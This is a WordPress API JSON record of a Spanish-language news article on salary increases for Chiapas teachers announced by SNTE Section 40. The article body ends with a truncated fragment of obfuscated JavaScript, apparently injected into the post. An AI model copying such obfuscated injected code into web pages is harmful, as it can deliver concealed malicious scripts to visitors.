{"id":24273,"date":"2025-09-30T04:02:35","date_gmt":"2025-09-30T04:02:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24273"},"modified":"2025-09-30T04:02:36","modified_gmt":"2025-09-30T04:02:36","slug":"maestros-tienen-aumento-salarial-a-partir-de-esta-quincena","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24273","title":{"rendered":"Maestros tienen aumento salarial a partir de esta quincena"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000357021-1024x768.jpg\" alt=\"\" class=\"wp-image-24274\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000357021-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000357021-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000357021-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000357021-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000357021-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>29 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- El Secretario General de la Secci\u00f3n 40 del SNTE, Oved Balderas Tovilla, dio a conocer que los docentes agremiados tendr\u00e1n un aumento salarial a partir de esta quincena.<\/p>\n\n\n\n<p>El cual se aplica de acuerdo con la categor\u00eda y la funci\u00f3n de cada docente dentro de los diferentes niveles educativos.<\/p>\n\n\n\n<p>\u201cPara la mayor\u00eda de los compa\u00f1eros y compa\u00f1eras de educaci\u00f3n b\u00e1sica, el incremento directo al salario ser\u00e1 del 7% y al sumar otros conceptos, este porcentaje se consolida en un 9% para el grueso de la base magisterial, y puede llegar hasta un 11% para los docentes que ocupan cargos directivos, quienes recibir\u00e1n un 2% adicional\u201d, precis\u00f3.<\/p>\n\n\n\n<p>Por otro lado, los maestros de educaci\u00f3n media superior y superior, conocidos como &#8220;los homologados&#8221;, recibir\u00e1n un incremento del 8%, as\u00ed como un aumento en el concepto de despensa.<\/p>\n\n\n\n<p>El l\u00edder sindical detall\u00f3 que el aumento salarial integra m\u00faltiples partidas, entre las que se incluyen: Un 7% de incremento salarial base, aumento para los docentes en Carrera Magisterial (conceptos 11\/302 y 11\/305).<\/p>\n\n\n\n<p>Compensaci\u00f3n provisional compactable del 7%, material de apoyo acad\u00e9mico (2%), prestaciones gen\u00e9ricas como material did\u00e1ctico, despensa, previsi\u00f3n social m\u00faltiple, asignaci\u00f3n docente gen\u00e9rica y compensaci\u00f3n adicional, pendientes y gestiones en curso<\/p>\n\n\n\n<p>Balderas Tovilla agreg\u00f3 que este ajuste salarial tambi\u00e9n se ver\u00e1 reflejado a lo largo del a\u00f1o fiscal en otros conceptos gen\u00e9ricos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 29 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- El Secretario General de la Secci\u00f3n 40 del SNTE, Oved Balderas Tovilla, dio a conocer que los docentes agremiados tendr\u00e1n un aumento salarial a partir de esta quincena. El cual se aplica de acuerdo con la categor\u00eda y la funci\u00f3n de cada docente dentro de los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24274,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24273","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24273","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24273"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24273\/revisions"}],"predecessor-version":[{"id":24275,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24273\/revisions\/24275"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24274"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24273"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24273"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24273"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}